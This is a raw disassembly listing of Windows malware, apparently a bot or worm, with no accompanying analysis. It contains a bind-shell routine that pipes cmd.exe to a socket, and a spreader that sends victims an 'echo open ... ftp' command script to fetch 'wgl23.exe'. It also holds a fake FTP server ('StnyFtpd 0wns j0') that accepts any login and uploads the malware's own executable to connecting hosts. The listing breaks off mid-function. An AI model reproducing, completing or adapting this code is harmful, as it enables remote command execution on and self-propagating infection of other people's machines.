; sub_40EF61+49�j
lea eax, [ebp+var_4]
and [ebp+var_4], 0
push 0
push eax
lea eax, [ebp+var_404]
push 400h
push eax
push dword_4E6F7C
call ds:dword_4F63F0 ; ReadFile
cmp [ebp+var_4], 0
jle short loc_40EF6A
push 0
lea eax, [ebp+var_404]
push [ebp+var_4]
push eax
push dword_4E6F8C
call dword_4E4270 ; send
jmp short loc_40EF6A
sub_40EF61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EFAC proc near ; DATA XREF: sub_401CC7+2D16�o
var_11C = byte ptr -11Ch
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
Dst = word ptr -38h
var_36 = word ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 28h
mov esi, eax
pop ecx
lea edi, [ebp+var_11C]
rep movsd
push 1
xor edi, edi
pop esi
mov [eax+98h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_98]
call dword_4E4220 ; htons
push 6
push esi
push 2
mov [ebp+var_36], ax
call dword_4E42A0 ; socket
mov [ebp+arg_0], eax
lea eax, [ebp+Dst]
push 10h
push eax
push [ebp+arg_0]
call dword_4E424C ; bind
push 5
push [ebp+arg_0]
call dword_4E4248 ; listen
mov ebx, ds:dword_4F6404
mov esi, ds:dword_4F6370
loc_40F02C: ; CODE XREF: sub_40EFAC+1CB�j
push edi
push edi
push [ebp+arg_0]
call dword_4E42B4 ; accept
mov dword_4E6F8C, eax
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4E6F88
push offset dword_4E6F84
mov [ebp+var_C], 0Ch
mov [ebp+var_4], 1
mov [ebp+var_8], edi
call ebx ; CreatePipe
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4E6F80
push offset dword_4E6F7C
call ebx ; CreatePipe
push 44h ; Size
lea eax, [ebp+var_7C]
push edi ; Val
push eax ; Dst
call _memset
mov eax, dword_4E6F84
add esp, 0Ch
mov [ebp+var_44], eax
mov eax, dword_4E6F80
mov [ebp+var_40], eax
push edi
push 1
lea eax, [ebp+var_3C]
push 2
push eax
mov [ebp+var_7C], 44h
mov [ebp+var_50], 101h
mov [ebp+var_4C], di
call ds:dword_4F6400 ; GetCurrentProcess
push eax
push dword_4E6F80
call ds:dword_4F6400 ; GetCurrentProcess
push eax
call ds:dword_4F63FC ; DuplicateHandle
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_7C]
push eax
push edi
push edi
push 4000090h
lea eax, [ebp+var_C]
push 1
push eax
lea eax, [ebp+var_C]
push eax
push offset aCmd_exe ; "cmd.exe"
push edi
call ds:dword_4F6374 ; CreateProcessA
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EF61
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_4F6384 ; CreateThread
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EF1E
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_4F6384 ; CreateThread
push 0FFFFFFFFh
mov [ebp+var_10], eax
push [ebp+var_28]
call ds:dword_4F63A8 ; WaitForSingleObject
push edi
push [ebp+var_10]
call ds:dword_4F63B4 ; TerminateThread
push edi
push [ebp+var_14]
call ds:dword_4F63B4 ; TerminateThread
push [ebp+var_10]
call esi ; CloseHandle
push [ebp+var_14]
call esi ; CloseHandle
push edi
push [ebp+var_28]
call ds:dword_4F63F8 ; TerminateProcess
push dword_4E6F84
call esi ; CloseHandle
push dword_4E6F88
call esi ; CloseHandle
push dword_4E6F7C
call esi ; CloseHandle
push dword_4E6F80
call esi ; CloseHandle
push [ebp+var_24]
call esi ; CloseHandle
push [ebp+var_28]
call esi ; CloseHandle
jmp loc_40F02C
sub_40EFAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40F17C proc near ; DATA XREF: .data:00440010�o
jmp $+5
sub_40F17C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F181 proc near
push 0FFFEh
push 400h
call sub_419589
pop ecx
mov dword_4E6F94, eax
pop ecx
retn
sub_40F181 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F198 proc near ; DATA XREF: sub_40C165+34D�o
Dest = byte ptr -6C0h
var_2C0 = dword ptr -2C0h
var_C0 = byte ptr -0C0h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A4 = dword ptr -0A4h
Str = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 6C0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_B0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [eax+98h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_A4]
call dword_4E4220 ; htons
push ebx
push esi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], ebx
call dword_4E42A0 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jnz short loc_40F23F
cmp [ebp+var_1C], ebx
jnz short loc_40F21F
push ebx ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D6C
add esp, 14h
loc_40F21F: ; CODE XREF: sub_40F198+65�j
lea eax, [ebp+var_2C0]
push eax
call sub_415C77
push [ebp+var_AC]
call sub_40BAAA
pop ecx
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_40F23F: ; CODE XREF: sub_40F198+60�j
mov eax, [ebp+var_AC]
push 10h
imul eax, 234h
mov dword_457134[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E424C ; bind
cmp eax, esi
mov ebx, 400h
jnz loc_40F33A
call dword_4E41B4 ; WSAGetLastError
cmp eax, 2740h
jz short loc_40F2BF
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F29F
push esi ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D6C
add esp, 14h
loc_40F29F: ; CODE XREF: sub_40F198+E5�j
lea eax, [ebp+var_2C0]
push eax
call sub_415C77
push [ebp+var_AC]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_40F2BF: ; CODE XREF: sub_40F198+DE�j
push 0FFFEh
push ebx
call sub_419589
pop ecx
mov dword_4E6F94, eax
pop ecx
mov [ebp+var_12], ax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4E424C ; bind
cmp eax, esi
jnz short loc_40F33A
call dword_4E41B4 ; WSAGetLastError
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F31A
cmp eax, 2740h
jz short loc_40F31A
push esi ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D6C
add esp, 14h
loc_40F31A: ; CODE XREF: sub_40F198+159�j
; sub_40F198+160�j
lea eax, [ebp+var_2C0]
push eax
call sub_415C77
push [ebp+var_AC]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
loc_40F33A: ; CODE XREF: sub_40F198+CD�j
; sub_40F198+14C�j
push 5
push edi
call dword_4E4248 ; listen
cmp eax, esi
jz loc_40F41F
mov [ebp+var_4], 10h
mov esi, offset Str ; "wgl23.exe"
loc_40F357: ; CODE XREF: sub_40F198+1D7�j
; sub_40F198+227�j ...
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C0]
push eax
push edi
call dword_4E42B4 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40F357
cmp [ebp+var_1C], 0
jnz short loc_40F398
push 0 ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D6C
add esp, 14h
loc_40F398: ; CODE XREF: sub_40F198+1DD�j
lea eax, [ebp+var_2C0]
push eax
call sub_415C77
pop ecx
lea eax, [ebp+var_2C0]
push 0
push 200h
push eax
push [ebp+arg_0]
call dword_4E4238 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_40F357
push esi
push esi
push dword_4E3F28
push [ebp+var_B0]
call sub_40AFA9
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d >> o&echo user 1 >>o &e"...
lea eax, [ebp+Dest]
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4E4270 ; send
cmp eax, 0FFFFFFFFh
jz loc_40F357
inc dword_4E6F9C
jmp loc_40F357
; ---------------------------------------------------------------------------
loc_40F41F: ; CODE XREF: sub_40F198+1AD�j
push edi
call dword_4E42B8 ; closesocket
push [ebp+var_AC]
call sub_40BAAA
pop ecx
push 0
call ds:dword_4F63D4 ; ExitThread
sub_40F198 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F43A proc near ; DATA XREF: sub_40C165+22A�o
var_A70 = byte ptr -0A70h
var_8E0 = dword ptr -8E0h
var_6E0 = dword ptr -6E0h
var_4C8 = byte ptr -4C8h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_43C = dword ptr -43Ch
var_338 = byte ptr -338h
var_2D4 = byte ptr -2D4h
Dst = byte ptr -2A0h
var_23C = byte ptr -23Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
Str = byte ptr -128h
Dest = byte ptr -0FCh
var_C8 = byte ptr -0C8h
Str1 = byte ptr -0B0h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A70h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6E0]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A70]
xor esi, esi
push eax
push 101h
mov [ebp+var_1C], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_24], ebx
mov [ebp+var_22C], esi
mov [ebp+var_43C], esi
call ds:dword_4F6540 ; WSAStartup
push esi
push ebx
push 2
call ds:dword_4F6570 ; socket
mov esi, ds:dword_4F6544
lea ecx, [ebp+var_1C]
push 4
push ecx
mov edi, 0FFFFh
push 4
push edi
push eax
mov [ebp+var_8], eax
call esi ; setsockopt
lea eax, [ebp+var_2C]
push 4
push eax
push 0FFFFFFFBh
push edi
mov edi, [ebp+var_8]
push edi
call esi ; setsockopt
lea eax, [ebp+var_24]
push eax
push 8004667Eh
push edi
call ds:dword_4F6548 ; ioctlsocket
mov ax, word ptr dword_4E3F28
and [ebp+var_48], 0
push eax
mov [ebp+var_4C], 2
call dword_4E4220 ; htons
mov [ebp+var_4A], ax
lea eax, [ebp+var_4C]
push 10h
push eax
push edi
call ds:dword_4F654C ; bind
test eax, eax
jge short loc_40F500
mov eax, ebx
jmp loc_40FA6A
; ---------------------------------------------------------------------------
loc_40F500: ; CODE XREF: sub_40F43A+BD�j
push 0Ah
push edi
call ds:dword_4F6584 ; listen
mov [ebp+var_22C], ebx
mov ebx, ds:dword_4F6574
mov [ebp+var_228], edi
mov [ebp+var_4], edi
loc_40F51E: ; CODE XREF: sub_40F43A+11D�j
; sub_40F43A+628�j
push 41h
lea esi, [ebp+var_22C]
pop ecx
lea edi, [ebp+var_43C]
rep movsd
xor esi, esi
lea eax, [ebp+var_43C]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_4F6578 ; select
cmp eax, 0FFFFFFFFh
jz loc_40FA67
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_40F51E
loc_40F559: ; CODE XREF: sub_40F43A+622�j
xor esi, esi
push 64h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 64h ; Size
lea eax, [ebp+Str1]
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+var_43C]
push eax
push edi
call sub_43B892 ; __WSAFDIsSet
test eax, eax
jz loc_40FA55
cmp edi, [ebp+var_8]
jnz short loc_40F610
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_23C]
push eax
push [ebp+var_8]
call ds:dword_4F6554 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40FA55
xor ecx, ecx
cmp [ebp+var_22C], esi
jbe short loc_40F5DA
lea edx, [ebp+var_228]
loc_40F5CA: ; CODE XREF: sub_40F43A+19E�j
cmp [edx], eax
jz short loc_40F5DA
inc ecx
add edx, 4
cmp ecx, [ebp+var_22C]
jb short loc_40F5CA
loc_40F5DA: ; CODE XREF: sub_40F43A+188�j
; sub_40F43A+192�j
cmp ecx, [ebp+var_22C]
jnz short loc_40F5F8
cmp [ebp+var_22C], 40h
jnb short loc_40F5F8
mov [ebp+ecx*4+var_228], eax
inc [ebp+var_22C]
loc_40F5F8: ; CODE XREF: sub_40F43A+1A6�j
; sub_40F43A+1AF�j
cmp eax, [ebp+var_4]
jle short loc_40F600
mov [ebp+var_4], eax
loc_40F600: ; CODE XREF: sub_40F43A+1C1�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_40FA55
; ---------------------------------------------------------------------------
loc_40F610: ; CODE XREF: sub_40F43A+15A�j
push esi
lea eax, [ebp+Dst]
push 64h
push eax
push edi
call ds:dword_4F6568 ; recv
test eax, eax
jg short loc_40F677
mov edx, [ebp+var_22C]
xor ecx, ecx
cmp edx, esi
jbe short loc_40F66B
lea eax, [ebp+var_228]
loc_40F637: ; CODE XREF: sub_40F43A+207�j
cmp [eax], edi
jz short loc_40F645
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_40F637
jmp short loc_40F66B
; ---------------------------------------------------------------------------
loc_40F645: ; CODE XREF: sub_40F43A+1FF�j
dec edx
cmp ecx, edx
jnb short loc_40F665
lea eax, [ebp+ecx*4+var_228]
loc_40F651: ; CODE XREF: sub_40F43A+229�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_22C]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_40F651
loc_40F665: ; CODE XREF: sub_40F43A+20E�j
dec [ebp+var_22C]
loc_40F66B: ; CODE XREF: sub_40F43A+1F5�j
; sub_40F43A+209�j
push edi
call ds:dword_4F656C ; closesocket
jmp loc_40FA55
; ---------------------------------------------------------------------------
loc_40F677: ; CODE XREF: sub_40F43A+1E9�j
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+Dst]
push offset aSS_3 ; "%s %s"
push eax ; Src
call _sscanf
lea eax, [ebp+Str1]
push offset aUser_1 ; "USER"
push eax ; Str1
call _strcmp
add esp, 18h
test eax, eax
jnz short loc_40F6BB
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_40FA40
; ---------------------------------------------------------------------------
loc_40F6BB: ; CODE XREF: sub_40F43A+272�j
lea eax, [ebp+Str1]
push offset aPass ; "PASS"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6DF
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_40FA40
; ---------------------------------------------------------------------------
loc_40F6DF: ; CODE XREF: sub_40F43A+296�j
lea eax, [ebp+Str1]
push offset aSyst ; "SYST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F703
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_40FA40
; ---------------------------------------------------------------------------
loc_40F703: ; CODE XREF: sub_40F43A+2BA�j
lea eax, [ebp+Str1]
push offset aRest ; "REST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F727
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_40FA40
; ---------------------------------------------------------------------------
loc_40F727: ; CODE XREF: sub_40F43A+2DE�j
lea eax, [ebp+Str1]
push offset off_44B5D8 ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F74B
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_40FA40
; ---------------------------------------------------------------------------
loc_40F74B: ; CODE XREF: sub_40F43A+302�j
lea eax, [ebp+Str1]
push offset aType ; "TYPE"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F786
lea eax, [ebp+var_338]
push offset aA_0 ; "A"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F786
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_40FA40
; ---------------------------------------------------------------------------
loc_40F786: ; CODE XREF: sub_40F43A+326�j
; sub_40F43A+33D�j
lea eax, [ebp+Str1]
push offset aType_0 ; "TYPE"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F7C1
lea eax, [ebp+var_338]
push offset aI ; "I"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F7C1
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_40FA40
; ---------------------------------------------------------------------------
loc_40F7C1: ; CODE XREF: sub_40F43A+361�j
; sub_40F43A+378�j
lea eax, [ebp+Str1]
push offset aPasv ; "PASV"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F80F
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+Str]
rep movsd
push eax
lea eax, [ebp+Str]
push eax ; Str
movsw
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
loc_40F7FF: ; CODE XREF: sub_40F43A+414�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
loc_40F807: ; CODE XREF: sub_40F43A+4E7�j
mov edi, [ebp+arg_0]
jmp loc_40FA43
; ---------------------------------------------------------------------------
loc_40F80F: ; CODE XREF: sub_40F43A+39C�j
lea eax, [ebp+Str1]
push offset aList_0 ; "LIST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F850
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C8]
rep movsd
movsw
push eax
lea eax, [ebp+var_C8]
push eax ; Str
movsb
call _strlen
pop ecx
push eax
lea eax, [ebp+var_C8]
jmp short loc_40F7FF
; ---------------------------------------------------------------------------
loc_40F850: ; CODE XREF: sub_40F43A+3EA�j
lea eax, [ebp+Str1]
push offset aPort ; "PORT"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40F926
lea eax, [ebp+var_2D4]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+Dst]
push offset aS_24 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax ; Src
call _sscanf
lea eax, [ebp+Dest]
push eax ; Str
call _atoi
mov edi, eax
lea eax, [ebp+var_2D4]
push eax ; Str
call _atoi
mov [ebp+var_C], eax
push 32h ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
add esp, 34h
lea eax, [ebp+Dest]
push [ebp+var_C]
push edi
push offset aXX ; "%x%x\n"
push eax ; Dest
call _sprintf
push 10h ; Radix
lea eax, [ebp+Dest]
push esi ; EndPtr
push eax ; Str
call _strtoul
add esp, 1Ch
mov [ebp+var_C], eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_3C]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax ; Dest
call _sprintf
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
push [ebp+arg_0]
call ebx ; send
jmp loc_40F807
; ---------------------------------------------------------------------------
loc_40F926: ; CODE XREF: sub_40F43A+42B�j
lea eax, [ebp+Str1]
push offset aRetr ; "RETR"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40FA21
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
call sub_40FA71
pop ecx
cmp eax, 1
pop ecx
jnz loc_40FA17
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_8E0]
push offset aFtpTransferSta ; "ftp transfer started to: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40F9A6
push esi ; int
lea eax, [ebp+var_8E0]
push [ebp+var_448] ; int
push eax ; int
lea eax, [ebp+var_4C8]
push eax ; Str
push [ebp+var_6E0] ; int
call sub_409D6C
add esp, 14h
loc_40F9A6: ; CODE XREF: sub_40F43A+547�j
call sub_40FAEE
cmp eax, 1
jnz loc_40FA43
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_8E0]
push offset aFtpTransferCom ; "ftp transfer complete to: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40FA02
push esi ; int
lea eax, [ebp+var_8E0]
push [ebp+var_448] ; int
push eax ; int
lea eax, [ebp+var_4C8]
push eax ; Str
push [ebp+var_6E0] ; int
call sub_409D6C
add esp, 14h
loc_40FA02: ; CODE XREF: sub_40F43A+5A3�j
lea eax, [ebp+var_8E0]
push eax
call sub_415C77
inc dword_4E6D40
pop ecx
jmp short loc_40FA43
; ---------------------------------------------------------------------------
loc_40FA17: ; CODE XREF: sub_40F43A+523�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_40FA40
; ---------------------------------------------------------------------------
loc_40FA21: ; CODE XREF: sub_40F43A+501�j
lea eax, [ebp+Str1]
push offset aQuit_1 ; "QUIT"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40FA43
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_40FA40: ; CODE XREF: sub_40F43A+27C�j
; sub_40F43A+2A0�j ...
push edi
call ebx ; send
loc_40FA43: ; CODE XREF: sub_40F43A+3D0�j
; sub_40F43A+574�j ...
push 64h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_40FA55: ; CODE XREF: sub_40F43A+151�j
; sub_40F43A+17A�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_40F559
jmp loc_40F51E
; ---------------------------------------------------------------------------
loc_40FA67: ; CODE XREF: sub_40F43A+10F�j
push 1
pop eax
loc_40FA6A: ; CODE XREF: sub_40F43A+C1�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40F43A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA71 proc near ; CODE XREF: sub_40F43A+519�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4F6540 ; WSAStartup
push 0
push 1
push 2
call ds:dword_4F6570 ; socket
push [ebp+arg_0]
mov dword_4E6FA0, eax
mov [ebp+var_10], 2
call ds:dword_4F655C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_4F6560 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_4E6FA0
call ds:dword_4F6564 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40FAE9
push dword_4E6FA0
call ds:dword_4F656C ; closesocket
call ds:dword_4F653C ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40FAE9: ; CODE XREF: sub_40FA71+60�j
push 1
pop eax
leave
retn
sub_40FA71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FAEE proc near ; CODE XREF: sub_40F43A:loc_40F9A6�p
DstBuf = byte ptr -504h
Filename = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+Filename]
push 104h
push eax
push 0
call ds:dword_4F6378 ; GetModuleFileNameA
lea eax, [ebp+Filename]
push offset aRb ; "rb"
push eax ; Filename
call _fopen
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40FB85
test byte ptr [esi+0Ch], 10h
jnz short loc_40FB69
push edi
mov edi, 400h
loc_40FB31: ; CODE XREF: sub_40FAEE+78�j
push esi ; File
push 1 ; Count
lea eax, [ebp+DstBuf]
push edi ; ElementSize
push eax ; DstBuf
call sub_41EFA0
add esp, 10h
lea eax, [ebp+DstBuf]
push 0
push edi
push eax
push dword_4E6FA0
call ds:dword_4F6574 ; send
push 1
call ds:dword_4F6380 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_40FB31
pop edi
loc_40FB69: ; CODE XREF: sub_40FAEE+3B�j
push esi ; File
call _fclose
pop ecx
push dword_4E6FA0
call ds:dword_4F656C ; closesocket
call ds:dword_4F653C ; WSACleanup
push 1
pop eax
loc_40FB85: ; CODE XREF: sub_40FAEE+35�j
pop esi
leave
retn
sub_40FAEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB88 proc near ; DATA XREF: sub_401CC7+2243�o
; sub_40C165+475�o
Str = byte ptr -28F0h
Str1 = byte ptr -18F0h
Dest = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
Dst = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_14], esi
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_25C]
call dword_4E4220 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4E42A0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_40FF79
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_457134[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E424C ; bind
cmp eax, 0FFFFFFFFh
jz loc_40FF79
push 7FFFFFFFh
push edi
call dword_4E4248 ; listen
cmp eax, 0FFFFFFFFh
jz loc_40FF79
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call dword_4E42BC ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_40FF79
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_40FC5F: ; CODE XREF: sub_40FB88+3E7�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call dword_4E4208 ; select
cmp eax, 0FFFFFFFFh
